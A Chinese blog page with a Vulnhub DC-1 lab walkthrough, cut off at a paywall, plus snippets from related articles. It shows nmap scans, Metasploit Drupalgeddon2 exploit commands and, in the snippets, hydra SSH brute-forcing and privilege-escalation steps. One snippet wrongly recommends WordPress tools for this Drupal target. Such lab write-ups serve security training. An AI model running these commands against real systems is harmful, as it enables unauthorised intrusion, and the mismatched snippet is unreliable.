Vulnhub靶机实战——DC-1

最新推荐文章于 2025-03-01 12:17:17 发布

冠霖L

最新推荐文章于 2025-03-01 12:17:17 发布

阅读量2k

点赞数 4

分类专栏：靶机文章标签： DC-1 靶机渗透测试

本文链接：https://blog.csdn.net/weixin_43583637/article/details/101542749

版权

靶机DC-1下载地址：https://download.vulnhub.com/dc/DC-1.zip

描述：靶机DC-1共有5个flag，并且需要root权限才可以找到并查看flag

环境：Vmware 15 Pro虚拟机软件

DC-1靶机IP地址：192.168.220.130

Kali的IP地址：192.168.220.131

本次DC-1靶机渗透测试，靶机与kali都以NAT模式连接网络，查看kali的IP地址：

ip addr

使用nmap扫描工具，扫描192.168.220.0/24网段，发现存活主机，断定192.168.220.130是DC-1靶机的IP地址

nmap -sP 192.168.220.0/24 -oN nmap220.sP

nmap扫描靶机开放的端口号，扫描范围0-65535，发现开放22（ssh）、80（http）、111和57744共四个端口

nmap -A 192.168.220.130 -p- -oN nmap130.A

浏览器输入DC-1靶机IP地址访问网站：http://192.168.220.130

发现网站是用Drupal（CMS+PHP）搭建的，使用的是Drupal 7版本

使用msfconsole查找可以针对Drupal的模块

msf > search drupal    #查找可用于Drupal的模块

尝试使用查询出来的模块，从一个开始尝试使用，发现只有三、五两个模块可以针对Drupal 使用，并能够成功反弹shell，其他模块皆失败

msf > use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(unix/webapp/drupal_drupalgeddon2) > set RHOST 192.168.220.130
msf exploit(unix/webapp/drupal_drupalgeddon2) > show options
msf exploit(unix/webapp/drupal_drupalgeddon2) > run

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

冠霖L

关注关注

4
点赞
踩
18

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用（二）

杨秀璋的专栏

04-11

1万+

这是作者的网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您们喜欢，一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目，采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用，通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章，希望对您有所帮助。

Vulnhub靶机实战——DC-6

冠霖L的博客

10-28

3993

靶机DC-6下载地址：https://download.vulnhub.com/dc/DC-6.zip 环境：VMware 15虚拟机软件 DC-6靶机IP地址：192.168.220.139 Kali的IP地址：192.168.220.142 DC-6靶机与kali都以NAT模式连接到网络，查看kali的IP地址：192.168.220.142...

2 条评论您还未登录，请先登录后发表或查看评论

vulnhub的DC-1

BurYiA的博客

05-02

688

文章目录vulnhub的DC-1准备工作1.主机查找2.信息搜集3.正文方法一方法二 vulnhub的DC-1 大神们可以退场了，小白的第一篇文章，可能会有很多错误，很多地方可能也会说不清楚。望见谅。前段时间了解到这个平台，然后就开始难受了，真心不会做（就是太菜了）。闲话就不多说了，开始吧准备工作 1.DC-1虚拟机（可能得搭梯子，自行尝试） 2.kali虚拟机 1.主机查找这个就是基本操作...

DC-1靶机

weixin_52525624的博客

02-24

335

nmap -sP 192.168.1.0/24 然后找到咱们的靶机 nmap -sV -Pn -n 192.168.1.57 访问该站点并查看robots.txt敏感文件依次访问robots.txt文件中的敏感文件目录信息，发现UPGRADE.txt文件爆露出版本号寻找drupal 7.X版本漏洞，并进行利用 2：使用MSF搜索相关模块并进行利用 Search drupal Use exploit/unix/webapp/drupal_drup...

VulnHub-DarkHole_2靶机搭建保姆级教程2025

最新发布

CL1799438883的博客

03-01

241

‌是一个提供各种网络攻防靶场的平台‌，主要用于网络安全学习和渗透测试。用户可以通过Vulnhub下载各种虚拟镜像，这些镜像模拟了真实的网络环境，用户可以在这些环境中进行渗透测试和安全演练‌。下载zip文件并解压。

vulnhub靶机：DC-1

Keepb1ue的博客

09-28

2133

文章目录靶机配置说明:靶机环境配置:靶机渗透开始:确定目标ip:端口扫描:常规扫描下目录:msf漏洞利用:切换到交互式shell:获取敏感信息:重置管理员密码:添加管理员用户:suid提权: 靶机配置说明: 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机：DC1 (VirtualBox) IP:192.168.56.110 攻击机：Kali(VMware) IP:192.168.56.108 在下载地址中有详细的靶机说明，而DC-1需要寻找的flag总数为

Vulnhub靶机 DC-1

菜浪马废的博客

03-19

328

查找靶机IP 扫描本地，254是Kali，那138就是DC-1 arp-scan -l 对DC-1进行端口扫描发现开放80端口，进浏览器查看一下 nmap -sV 192.168.0.138 发现CMD是Drupal 漏洞查找 msfconsole 启动msf search drupal 查找drupal漏洞看到最新的是2019-02-20，但是等级是normal，还是用2018-...

vulnhub靶机渗透DC-1

RestoreJustice的博客

03-17

531

下载后用 VMware 或者 VirtualBox 打开，并配置好网卡，靶机与攻击机应置于同一网络下，靶机默认是桥接模式，能用攻击机连接到就行。这里提权我们可以考虑爆破22端口或者内核提权（绝招，实在没办法在考虑），但在此之前我们可以尝试找找是否有一些拥有suid标识的命令，利用其提权。使用nmap扫描主机服务、端口情况（-p-等价于-p 1-65535）：nmap -p- -A 192.168.3.27。而且是几年前的，可以考虑使用MSF，上面应该集成了相关漏洞利用脚本，如果没有就得手工利用了。

Vulnhub靶机实战-Warzone 1

黑白的博客

01-10

802

声明好好学习，天天向上搭建使用virtualbox打开，网络配置和我的PRESIDENTIAL文章一样，是要vmware和virtualbox互连渗透存活扫描，发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.5 -p 1-65535 -oN nmap.A 开启端口 21,22,5000 以匿名用户登录ftp，发现了两个文件。 note里面提示请使用jar包加密密码反编译一下jar包，用juid

Vulnhub靶机实战——DC-3

冠霖L的博客

09-27

9233

靶机DC-3下载地址：https://download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址：https://download.vulnhub.com/dc/DC-3VMware.zip 注：开始将DC-3.ova文件导入VMware虚拟机，发现无法获取到靶机IP地址，作者在DC-3靶机下载页面提到可以下载已经搭建好的DC-3VMware，然...

Vulnhub靶机实战——DC-4

冠霖L的博客

09-27

3284

靶机DC-4下载地址：https://download.vulnhub.com/dc/DC-4.zip 描述：从靶机DC-3开始，只有一个入口和一个最终的flag，只有拿到root权限才可以发现最终的flag，DC-4也是一样环境：Vmware 15 Pro虚拟机软件 DC-4靶机IP地址：192.168.220.138 Kali的IP地址：...

Vulnhub靶机实战——DC-2

冠霖L的博客

09-27

4958

靶机DC-2下载地址：https://download.vulnhub.com/dc/DC-2.zip 描述：靶机DC-2与DC-1一样，共有5个flag，但最终需要root权限才可以找到并查看flag 环境：Vmware 15 Pro虚拟机软件 DC-1靶机IP地址：192.168.220.132 Kali的IP地址：192.168.22...

Vulnhub靶机实战——DC-8

冠霖L的博客

10-30

3576

靶机DC-8下载地址：https://download.vulnhub.com/dc/DC-8.zip 环境：VMware 15虚拟机软件 DC-8靶机IP地址：192.168.220.156 Kali的IP地址：192.168.220.155 DC-8靶机与kali都以NAT模式连接到网络，查看kali的IP地址：192.168.220.155 ...

Vulnhub靶机实战-Lampiao

黑白的博客

01-10

649

声明好好学习，天天向上搭建使用virtualbox打开，网络和我的PRESIDENTIAL一样，是要vmware和virtualbox互连渗透存活扫描，发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.12 -p 1-65535 -oN nmap.A 开启端口发现开启80，22，1898 访问80 http://192.168.239.12 80开了个寂寞 dirscan连接还有问题看看18

Vulnhub靶机实战-HOGWARTS DOBBY

黑白的博客

01-10

565

声明好好学习，天天向上搭建使用virtualbox打开，网络和我的PRESIDENTIAL一样，是要vmware和virtualbox互连渗透存活扫描，发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.8 -p 1-65535 -oN nmap.A 开启端口发现开启80 访问80 http://192.168.239.6 F12查看源码，发现目录访问 http://192.168.239.8

Vulnhub靶机实战-CH4INRULZ

黑白的博客

01-18

542

声明好好学习，天天向上搭建使用vmware打开渗透存活扫描，发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.180 -p 1-65535 -oN nmap.A 开启端口发现开启21，22，80，8011 访问80 http://192.168.31.180 扫描web目录 python3 dirsearch.py -u 192.168.31.180 development中得登录 index中告诉我们还没开发完剩下的没什么消息了访问备份文

Vulnhub靶机实战-Billu_b0x

黑白的博客

01-10

556

声明好好学习，天天向上搭建使用virtualbox打开，网络和我的PRESIDENTIAL一样，是要vmware和virtualbox互连渗透存活扫描，发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.14 -p 1-65535 -oN nmap.A 开启端口发现开启80，22 访问80 http://192.168.239.14 熟悉的四个字母SQLi 试了一堆，试了个寂寞 vulnhub惯例

Vulnhub靶机实战-PRESIDENTIAL

黑白的博客

01-10

1352

声明好好学习，天天向上搭建 vulnhub官网下载完镜像后，用vmware打开，遇到错误点击重试，即可，选择NAT后，直接就DHCP了注意一点，vmware的兼容性，有问题，我用vmware，反弹shell和提权的时候，惨遭失败，一定要用oracle virtualbox，一定一定一定 vmware我用的桥接，virtualbox用的仅主机网卡#2，调了一下本机的网卡，调了半天，两边才能互相ping通信我一句话，这非技术问题困了我好几天，弄不出来，vulnhub首页说建议用virtualbox，又说

Vulnhub 靶机实战系列：DC -1

WangRuaRua

05-29

540

靶机搭建靶机下载地址： https://www.five86.com/dc-1.html 靶机DC-1与kali都以NAT模式连接网络信息收集 1.使用arp-scan探索 arp-scan -l //命令探测同一区域中存活主机 kali ip：192.168.175.134 DC-1 ip：192.168.175.128 2.使用Namp扫描 Namp -A 192.168.175.128 //全面扫描开放了22 ssh、80 http apache、111 rpcbind 3.访问

vulnhub靶机DC-1

02-08

### VulnHub DC-1 靶机攻略介绍 #### 下载地址 VulnHub是一个提供各种虚拟机镜像用于安全测试和学习渗透测试技巧的平台。对于DC-1靶机，可以在[VulnHub官网](https://www.vulnhub.com/)搜索并下载该靶机镜像文件。 #### 初始信息收集在启动DC-1之后，通过网络扫描工具如`nmap`来发现开放端口和服务版本是非常重要的初步操作[^2]。这有助于了解目标系统的潜在弱点所在之处。 ```bash nmap -A <target_ip> ``` #### Web应用漏洞探测一旦确认存在Web服务运行于特定IP地址之上，则可以采用专门针对WordPress站点的安全评估工具WPScan来进行进一步的信息挖掘工作： ```bash wpscan --url http://<target_ip>/wordpress/ ``` 此命令能够帮助识别可能存在的插件或主题中的已知漏洞，并尝试获取管理员用户名列表等有用情报[^1]。 #### 获取初始访问权限当已经掌握了某些关于网站后台管理账号线索后（比如默认用户名），可借助Hydra这样的暴力破解程序配合常用密码字典对登录界面发起攻击以期获得合法凭证进入内部环境: ```bash hydra -L /usr/share/wordlists/usernames.txt -P /usr/share/wordlists/passwords.txt ssh://<target_ip> ``` 这里假设SSH服务对外开放并且允许远程登陆；实际过程中还需根据具体情况调整相应参数设置[^3]。 #### 提升权限至root级别成功创建Meterpreter会话意味着获得了较为深入的目标主机控制权，在此基础上继续探索其他未授权区域直至找到可用于提升当前用户权限的方法。例如，如果遇到弱配置下的Sudoers文件或是设置了简单密码的辅助账户，都可以成为突破口之一[^5]: ```bash sudo -l # 查看是否有无需密码即可执行高权限指令的情况 whoami # 确认当前身份 su admin # 尝试切换到更高权限用户 ``` 以上就是有关如何攻克VulnHub平台上名为DC-1这一挑战性实验项目的概览描述以及部分关键技术要点提示。